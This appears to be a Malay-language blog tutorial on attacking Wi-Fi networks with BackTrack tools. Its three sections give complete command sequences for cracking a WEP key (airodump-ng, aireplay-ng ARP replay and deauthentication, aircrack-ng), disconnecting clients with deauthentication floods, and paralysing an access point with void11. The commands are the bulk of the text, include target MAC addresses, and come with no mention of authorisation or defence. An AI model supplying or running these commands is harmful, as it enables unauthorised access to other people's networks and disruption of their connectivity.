Network


  1. Jalankan BackTrack.

  1. Reset driver wireless. taipkan:

#airmon-ng -> periksa interface ath yang aktif

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila ath1 aktif

#airmon-ng start wifi0

  1. Buka 3 buah console.

  1. Console 1, taipkan:

#airodump-ng ath0 -> scanning hotspot yang aktif.

#airodump-ng –channel 11 –bssid 00:0E:2E:C2:2C:0E -w target ath0

Keterangan:

Proses ini untuk capture informasi yang dapat membantu dalam menembus WEP Key.

–bssid -> MAC-Address dari AP yang akan di crack

-w target -> hasil capture ini akan disimpan di file yang namanya target

  1. Console 2, taipkan:

Untuk membantu menciptakan pengumpulan paket data

#aireplay-ng –arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.

-h -> MAC-Address dari client yang aktif terhubung ke AP.

  1. Console 3, taipkan:

Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng –deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:


-c -> MAC-Address dari Client

-a -> MAC-Address dari AP

  1. Setelah terkumpul paket data yang cukup, dilakukan cracking:

#aircrack-ng target*.cap

Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.

Semoga Berjaya….

Melumpuhkan Client yang terhubung pada suatu AP:

1. Jalankan Live CD LinuxBackTrack 2.

2. Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. catatkan semua informasi yang didapati.

3. Tutup Kismet, buka console, taipkan:

#airmon-ng stop ath0 -> untuk mematikan driver ath0

#airmon-ng stop ath1 -> untuk mematikan driver ath1

#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver

4. Jalankan scanning wireless menggunakan Airodump :

#airodump-ng ath0

5. kemudian buka konsole satu lagi(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). taipkan:

#ifconfig ath0 up -> untuk mengaktifkan ath0

#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).

6. Langkah terakhir, kita lakukan serangan, taipkan:

#aireplay-ng –deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

Aireplay-ng -> program yang digunakan untuk melakukan de authentication

–deauth -> option untuk serangan de authentication

20 -> jumlah sending packet

00:0E:2E:C1:1E:83 -> MAC-Address komputer target

-a -> option untuk Access Point

00:0E:2E:C2:2C:0E -> MAC-Address Access Point

ath0 -> interface yang digunakan untuk menyerang.

Semoga Berjaya…

Yang diperlukan adalah software void11(download di http://www.wlsec.net/void11) dan Kismet( kalau mahu lebih mudah pakai Distro Linux Auditor).Hardware yang diperlukan bagi Laptop dengan PCMCIA Wifi chipset Prism.

Langkah seterusnya, jalankan Kismet terlebih dahulu untuk melakukan scanning rangkaian wifi, setelah anda mendapat info MAC address dari AP target melalui Kismet, klikan pada console:

# switch-to-hostap
# iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master
# void11_penetration wlan0 -D -t 1 -B 00:0E:2E:C2:2C:0E

keterangan : -D = debug
-t 1 = type serangan ke AP
-B = MAC Address AP target

-> Ingat pada waktu menjalankan serangan, Kismet masih aktif berjalan, jangan menutupnya, tunggu beberapa saat, dan berikutnya……………… Lumpuhlan Kerajaan AP target.

Semoga Berjaya.

Maklumat Lanjut:

  • http://www.marshost.com/~rashmun/wep.cracking.html
  • http://joaquinmartens.com/securewificrack.html